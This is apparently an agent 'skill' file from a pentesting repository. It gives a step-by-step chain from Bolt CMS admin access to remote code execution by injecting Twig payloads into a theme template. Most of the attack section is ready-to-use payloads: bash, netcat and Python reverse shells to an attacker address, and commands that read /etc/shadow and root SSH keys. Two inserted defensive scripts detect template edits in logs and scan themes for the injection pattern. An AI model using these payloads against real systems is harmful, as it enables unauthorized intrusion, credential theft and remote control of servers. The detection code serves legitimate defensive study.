Hacktricks-skills bolt-cms-pentesting

How to exploit Bolt CMS for Remote Code Execution (RCE) via Twig template injection. Use this skill when pentesting Bolt CMS installations, when you need to check for SSTI vulnerabilities in Bolt CMS, or when you have admin access to a Bolt CMS instance and want to escalate to RCE. This skill covers the complete exploitation chain from admin login to code execution.

Install: clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
Manifest: skills/network-services-pentesting/pentesting-web/bolt-cms/SKILL.MD

Bolt CMS Pentesting

A skill for exploiting Bolt CMS vulnerabilities to achieve Remote Code Execution (RCE) through Twig Server-Side Template Injection (SSTI).

Prerequisites

  • Admin access to the Bolt CMS instance
  • Network access to receive reverse shells (if using shell payloads)
  • Authorization to perform security testing on the target

Exploitation Workflow

Step 1: Access Admin Configuration

  1. Navigate to the admin panel at /bolt and log in with admin credentials
  2. Go to Configuration -> View Configuration -> Main Configuration
     • Direct URL: /bolt/file-edit/config?file=/bolt/config.yaml
  3. Identify the active theme and note its name (e.g., base-2021)

Step 2: Locate Template File

  1. Navigate to File management -> View & edit templates
  2. Select the theme identified in Step 1
  3. Open index.twig for editing
     • Direct URL pattern: /bolt/file-edit/themes?file=/THEME_NAME/index.twig

Step 3: Inject Twig Payload

Insert a Twig template injection payload into the template file. Common payloads:

Reverse Shell (Bash):

{{['bash -c "bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1"']|filter('system')}}

Command Execution:

{{['COMMAND_HERE']|filter('system')}}

Read File:

{{['cat /etc/passwd']|filter('system')}}

Verify Execution:

{{['id']|filter('system')}}

Save the changes after inserting your payload.

Step 4: Clear Cache

Navigate to Maintenance -> Clear the cache to ensure the modified template is loaded. This step is critical: without clearing the cache, the payload will not execute.

Step 5: Trigger Execution

Access the page as a regular user (non-admin) to trigger the payload execution. The injected code will run when the template is rendered.
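From the defender's side, the workflow above leaves a distinctive trail: an admin-panel read of config.yaml, then a GET and a POST to the theme file editor for a .twig file, then page views that render the modified template. The script below is an added example, not part of the original skill, that parses web server access logs in combined format and flags template saves through the Bolt file editor. The admin paths are the ones the workflow uses; the log lines and IP addresses are constructed for the example.

```python
"""Flag admin template edits in a web server access log.

Added example for the Bolt CMS skill: the /bolt/file-edit/themes and
/bolt/file-edit/config paths are the ones the exploitation workflow uses;
the log lines below are constructed and do not come from a real server.
"""
import re
from urllib.parse import urlsplit, parse_qs

# Apache/nginx "combined" format, reduced to the fields this check needs.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Constructed sample: a normal page view, the config read from Step 1,
# the template being opened and then saved (POST) in Steps 2-3, and a
# later front-page view from a different address (Step 5).
SAMPLE_LOG = """\
203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "GET / HTTP/1.1" 200 5120
203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "GET /bolt/file-edit/config?file=/bolt/config.yaml HTTP/1.1" 200 8801
203.0.113.7 - - [01/Jan/2024:10:00:20 +0000] "GET /bolt/file-edit/themes?file=/base-2021/index.twig HTTP/1.1" 200 6204
203.0.113.7 - - [01/Jan/2024:10:00:41 +0000] "POST /bolt/file-edit/themes?file=%2Fbase-2021%2Findex.twig HTTP/1.1" 302 0
198.51.100.4 - - [01/Jan/2024:10:01:02 +0000] "GET / HTTP/1.1" 200 5133
"""


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def file_editor_requests(log_text):
    """Every request to the Bolt admin file editor, with the decoded file parameter."""
    hits = []
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if not rec:
            continue
        url = urlsplit(rec["target"])
        if not url.path.startswith("/bolt/file-edit/"):
            continue
        # parse_qs already percent-decodes, so %2F becomes / here.
        file_param = parse_qs(url.query).get("file", [""])[0]
        hits.append({
            "ip": rec["ip"],
            "ts": rec["ts"],
            "method": rec["method"],
            "path": url.path,
            "file": file_param,
            "status": rec["status"],
        })
    return hits


def template_saves(log_text):
    """The subset that actually writes a .twig file: POSTs to the themes editor."""
    return [
        h for h in file_editor_requests(log_text)
        if h["method"] == "POST"
        and h["path"] == "/bolt/file-edit/themes"
        and h["file"].endswith(".twig")
    ]


if __name__ == "__main__":
    for h in template_saves(SAMPLE_LOG):
        print(f"[{h['ts']}] {h['ip']} saved template {h['file']} (HTTP {h['status']})")
```

Template saves through the admin UI should be rare on a production site and tied to a change ticket, so an alert on every `template_saves` hit is a reasonable starting rule; the broader `file_editor_requests` list is useful context when triaging, since the config read in Step 1 usually precedes the edit.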

Payload Examples

Basic Reverse Shell

{{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}}

Netcat Reverse Shell

{{['nc -e /bin/bash ATTACKER_IP PORT']|filter('system')}}

Python Reverse Shell

{{['python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\'ATTACKER_IP\',PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);subprocess.call([\'/bin/sh\',\'-i\'])"']|filter('system')}}

File Read

{{['cat /etc/passwd']|filter('system')}}
{{['cat /etc/shadow']|filter('system')}}
{{['cat /root/.ssh/id_rsa']|filter('system')}}

System Information

{{['whoami']|filter('system')}}
{{['id']|filter('system')}}
{{['uname -a']|filter('system')}}
{{['pwd']|filter('system')}}

Important Notes

  • Authorization Required: Only use this skill on systems you have explicit permission to test. Unauthorized exploitation is illegal.
  • Cache Clearing: The cache must be cleared after modifying templates for changes to take effect. This is a critical step.
  • Theme Identification: The exact theme name must be known to locate the correct template file. Check the config.yaml if unsure.
  • Payload Persistence: The payload persists in the template file until manually removed. Clean up after testing.
  • Template Syntax: Twig uses {{ }} for expressions. The filter('system') call applies the named PHP function to each element of the array, so each string is passed to system() and executed as a shell command.
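Because the payloads on this page all hinge on passing a quoted PHP function name to a Twig array filter, a defender can audit a theme directory for exactly that pattern. The scanner below is an added example, not part of the original skill: it walks a theme for .twig files and reports any filter, map, reduce or sort call whose callable is a string literal rather than the arrow function a normal template would use. The theme layout and the two sample templates are constructed for the demo.

```python
"""Audit Bolt theme templates for Twig array filters given a string callable.

Added example for the Bolt CMS skill. The regex and the sample templates
are constructed here; the theme name base-2021 is the one the workflow
uses as an example.
"""
import re
import tempfile
from pathlib import Path

# Twig's array filters legitimately take an arrow function, e.g.
# records|filter(r => r.published). A quoted PHP function name as the
# callable is not needed in a normal theme, so any such use is reported
# rather than matching a fixed denylist of function names.
SUSPICIOUS = re.compile(
    r"""\|\s*(?P<filter>filter|map|reduce|sort)\s*\(\s*['"](?P<callable>[A-Za-z_]\w*)['"]"""
)


def scan_text(text, name="<string>"):
    """Return one finding per suspicious Twig expression in `text`."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for m in SUSPICIOUS.finditer(line):
            findings.append({
                "file": name,
                "line": lineno,
                "filter": m.group("filter"),
                "callable": m.group("callable"),
                "snippet": line.strip(),
            })
    return findings


def scan_theme(theme_dir):
    """Walk a theme directory and scan every .twig file under it."""
    findings = []
    for path in sorted(Path(theme_dir).rglob("*.twig")):
        text = path.read_text(encoding="utf-8", errors="replace")
        findings.extend(scan_text(text, str(path)))
    return findings


# Constructed templates: a benign loop, and the same file with the
# page's verification payload appended.
BENIGN = "{% for r in records|filter(r => r.published) %}{{ r.title }}{% endfor %}\n"
INJECTED = BENIGN + "{{['id']|filter('system')}}\n"


def demo():
    """Write the constructed theme to a temporary directory and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        theme = Path(tmp) / "base-2021"
        (theme / "partials").mkdir(parents=True)
        (theme / "index.twig").write_text(INJECTED, encoding="utf-8")
        (theme / "partials" / "footer.twig").write_text(BENIGN, encoding="utf-8")
        return scan_theme(theme)


if __name__ == "__main__":
    for f in demo():
        print(f"{f['file']}:{f['line']}: |{f['filter']}('{f['callable']}') -> {f['snippet']}")
```

Run `scan_theme` against the live theme directory as part of an integrity check (or diff its output against a known-good checkout), and pair it with file-change monitoring on the theme path: a template that changes outside a deployment is the earlier and cheaper signal.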

Verification

After triggering the payload, verify execution by:

  1. Reverse Shell: Check for incoming connections on your listener
  2. Command Output: Look for command output in page source or logs
  3. Simple Commands: Test with id or whoami to confirm execution
  4. File Operations: Create a test file and verify it exists

Cleanup

After testing, remove the injected payload from the template file to restore normal functionality:

  1. Navigate back to File management -> View & edit templates
  2. Open the modified index.twig
  3. Remove the injected payload
  4. Save and clear the cache again

Related Techniques

  • Twig SSTI
  • Template Injection vulnerabilities
  • CMS exploitation
  • Privilege escalation via web applications